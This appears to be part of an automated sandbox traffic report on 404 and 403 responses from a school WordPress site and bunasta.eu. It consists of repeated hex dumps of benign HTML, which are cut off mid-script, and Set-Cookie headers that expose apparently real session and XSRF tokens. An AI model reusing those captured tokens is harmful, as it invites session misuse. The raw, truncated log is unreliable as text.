3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 30 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:58 GMTServer: Apache/2.4.38 (Debian)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:58 GMTServer: Apache/2.4.38 (Debian)Content-Length: 275Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 62 75 6e 61 73 74 61 2e 65 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at bunasta.eu Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:59 GMTSet-Cookie: publishedsite-xsrf=eyJpdiI6IlorckNMbEF4ZmhzaXNzWkRXUFF1anc9PSIsInZhbHVlIjoib21hQzNVNm1JbzZvdHlPZlUzYW1QeVFpR0g2VkRNbkw2a1l3K0RIdHNxdHNhWStrSUN6dHN0L2FPd3JTdjh4WjVvd3UxbEMzb3VMeWRBVE1sRlFJQTBVTURsc3RtczhlWCtzQlIvZ2RQQ3FGVHRUUWJSRzVKejZzamVEaytkUzIiLCJtYWMiOiI5YzViNmZhZmM4OTAyMWQ1OGUyZjZlMjg2NTMzY2Y1NDA4YTQzNDMwMTZhMzNlNDU2MDhkYzM3N2E2MDc5ZGM3IiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:59 GMT; Max-Age=1209600; path=/; samesite=laxSet-Cookie: XSRF-TOKEN=eyJpdiI6IkJZOU9NdmcrSEc1ZUlKdlc5UE4xTFE9PSIsInZhbHVlIjoiK0pDVEJMdGlkclhya09EMnMxVmVuWGtEdkd4ZXEzdDVTVlF0c0lvQzM3U0hTWFU3emtLRkExSmtrTlJ2aTlHMHhIR1d0dzZzS0FFN0srZklkbkhzNnJJQ1hsUlJrbUJKc0s2c0xZSlIrNmU3Qm5YUHpqeUhTWVZMMjVwZ1I2WVQiLCJtYWMiOiIwOGM2OTU4OWY1NjRkZGY5NTgyMzRhMzQ0Y2IzMWI3Y2Y5YWRhYWU0OGNmMTE3ZjIyMmY2ZmY4NjQyMzFjZmY2IiwidGFnIjoiIn0%3D; expires=Sun, 10-Dec-2023 05:59:59 GMT; Max-Age=1209600; path=/; samesite=laxSet-Cookie: PublishedSiteSession=eyJpdiI6Imp2NHlXTVlGa2hBNktWcnFZelRIR0E9PSIsInZhbHVlIjoiYjJyM3F4TkJrU09nUzkrRElWNjcvNVErcUpXNVZua0xPQlVVMVZHbnJwVUNnV09iUG52RWxoZData Raw: Data Ascii:
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:59 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 06:00:00 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 06:00:02 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 06:00:05 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 47 52 47 31 37 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 6c 65 74 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 5d 2c 6a 51 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 6a 51 75 65 72 79 7d 2c 24 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 2c 24 7d 3b 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 3d 6a 51 75 65 72 79 2c 77 69 6e 64 6f 77 2e 24 3d 6a 51 75 65 72 79 3b 6c 65 74 20 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 31 3b 6a 51 75 65 72 79 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 24 2e 66 6e 3d 6a 51 75 65 72 79 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 7d 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 69 66 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 72 65 74 75 72 6e 20 6a 51 75 65 72 79 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 24 3d 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 2c 63 75 73 74 6f 6d 48 65 61 64 53 63 72 69 70 74 73 3d 21 30 2c 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 7d 2c 6a 51 75 65 72 79 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 6a 71 75 65 72 79 50 61 72 61 6d 73 3d 5b 2e 2e 2e 6a 71 75 65 72 79 50 61 72 61 6d 73 2c 72 5d 7d 2c 24 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28
